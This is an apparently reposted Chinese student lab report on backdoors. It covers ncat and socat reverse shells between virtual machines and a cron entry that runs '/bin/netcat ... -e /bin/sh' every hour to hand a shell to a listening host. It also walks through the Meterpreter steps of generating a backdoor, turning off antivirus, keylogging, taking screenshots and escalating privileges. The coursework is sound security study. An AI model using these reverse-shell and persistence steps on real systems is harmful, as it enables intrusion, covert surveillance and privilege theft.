20145212罗天晨 后门原理与实践

20145212罗天晨 后门原理与实践


基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 我们在安装常用应用软件时,安装过程中附带的可能就有后门程序。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • windows:实验中做过的方式有直接双击开启后门程序、通过Windows->控制面板->管理工具启动任务计划程序、开机自启动的后门、和其他程序捆绑运行的后门程序
  • linux:通过在cron中添加任务,定时执行、通过一些脚本启动后门程序、通过和其他程序捆绑运行后门程序。

(3)Meterpreter有哪些给你映像深刻的功能?

  • 可以获取目标主机摄像头摄像头摄像头!!!这个功能好可怕……
  • 可以提权,并且针对不同的系统,提权的方式有很多种,由于我在实验中尝试用getsystem提权失败之后上网查看了教程,愈发觉得meterpreter很强大很可怕。。其中找到一篇写了windows下各种提权方法的博客,我后来的提权操作也是从这里借鉴的:
    Windows的多种提权方法

(4)如何发现自己有系统有没有被安装后门?

  • 低级一点的后门程序估计寻常的杀毒软件就可以查杀,比如我这次实验做的,一发送给win10主机就被360毙了。
  • 至于隐藏的稍深一些的后门,例如与软件捆绑的后门,我查了一下方法,可以下载一些比较专业的监视软件,例如下载者监视器1.0、Regmon704.rar等进行检测。
  • 还可以用抓包工具分析可疑软件是否有可疑操作,比如连接了一些乱七八糟的ip、在注册表项里操作了之类的。

实验总结体会

做了这次实验觉得小时候看起来无懈可击的电脑实际上漏洞百出,很容易就能被攻击。而且一些后门的存在让人有些无力感,因为windows操作系统本身就极有可能被留有后门……这样的话就算自己再怎么查杀也还是无法幸免,而且其他的操作系统大概也是一样的,感觉好不安。


实践过程记录

一、ncat的使用

1.实现两台虚拟机的互联

  • 本实验中实现了与5226夏艺华的虚拟机互联,以下是对话截图=..=
    877181-20170313110440557-360587922.jpg
    877181-20170313110529854-74849243.png

2.让本机的Windows获得Linux的Shell

  • 如图所示,使用本机windows系统获得linux系统的shell:
    877181-20170313123917698-1569472053.png

3.让linux获得windows的shell

  • 如图所示,在虚拟机中获得了windows的shell之后我输入了ipconfig,成功查看到了windows本机的ip地址信息,不过有很多乱码。
    877181-20170313123749260-1040828301.png
    877181-20170313123802354-1258740064.png

4.使用ncat实现文件传输

  • 如图所示,先在windows中打开监听,然后在linux系统中发送文件:
    877181-20170313142707635-1874904925.png
    877181-20170313142715995-583553973.png
  • 传输的文件保存在了C:\Users\Lenovo路径下,可以查看:(一开始以为保存在ncat所在的文件目录下=o=找了半天)
    877181-20170313143528448-700037784.png

5.cron的启动

  • 这里首先在linux中输入crontab -e指令,通过编辑增加一条定时任务
    从图中可以看出我输入的是29 * * * * /bin/netcat 10.1.1.120 5212 -e /bin/sh
    意味着在每个小时的29分,如果有一台ip地址为10.1.1.120的主机监听着linux,就会得到一个shell
    877181-20170313123025995-1898139875.png

  • 29分之前在主机上输入什么都不会有显示,但是一到29分,就可以使用指令查看虚拟机中的相关信息,这里我使用了ls指令,结果如下:
    877181-20170313123422276-511302579.png

……比较好奇为什么这里使用ls查看到的内容和第二步让本机的Windows获得Linux的Shell中查看到的不一样,而且有乱码…


二、socat的使用

使用socat获取主机操作Shell

  • 原理和之前使用ncat的时候是一样的,这次在linux上绑定端口并且反弹连接,使用windows系统开启监听
  • 这里也是在成功之后使用了ifconfig和ls进行测试:
    877181-20170313144316510-2057973906.png
    877181-20170313144323995-1667161714.png
    877181-20170313144421979-1488430137.png

任务计划启动

  • 在主机的控制面板中找到计划任务,打开任务计划程序,创建一个新任务,在操作选项中选择如下:
    877181-20170313225053713-698832255.png

  • 进行测试:

877181-20170313225819370-2031454268.png
877181-20170313225831057-898476739.png

三、meterpreter的使用

1.生成后门程序

  • 在虚拟机上使用指令生成后门程序,并通过ncat发送到windows主机上
  • 这里没关360的时候直接被发现并且查杀了……
    877181-20170313150738604-1098141477.png

  • 关闭360之后,打开msf进行相关设置,将端口号和ip地址都改成和生成后门程序时一样的数据,再在windows上运行后门程序:
    877181-20170313222418354-988036338.png

  • 得到shell,输入dir可以显示windows的磁盘目录信息:
    877181-20170313222600182-111949348.png

  • 可以通过shell指令得到windows的命令行界面,部分乱码可以忽略,这里使用了slmgr/div命令进行测试,主机上弹出版本号信息:
    877181-20170313223024354-1527252242.png

  • 对windows主机进行击键记录:
    877181-20170313223439916-2097056031.png

  • 对主机进行截屏并查看:
    877181-20170313223702151-1068022167.png

  • 安装系统服务:
    877181-20170313224300620-1553490914.png

  • 提升权限:

输入getuid查看当前用户权限
输入getsystem进行提权,但是这里显示由于环境错误,提权失败
877181-20170314145319745-1014144870.png

换提权方式:使用MS14-058之类的Exp进行提权,结果这个模块对于64为机不适用
877181-20170314151805541-100802726.png

再换==这次显示win10不易受这个攻击??
877181-20170314151857135-2144807871.png

我是该高兴自己的win10稍微安全那么一点点吗?……试了半天发现都没有正确的攻破win10……于是果断的换成了攻击我安装的win7虚拟机……
成功的进行了提权:
877181-20170314213248526-18338476.png

转载于:https://www.cnblogs.com/alovera/p/6542235.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值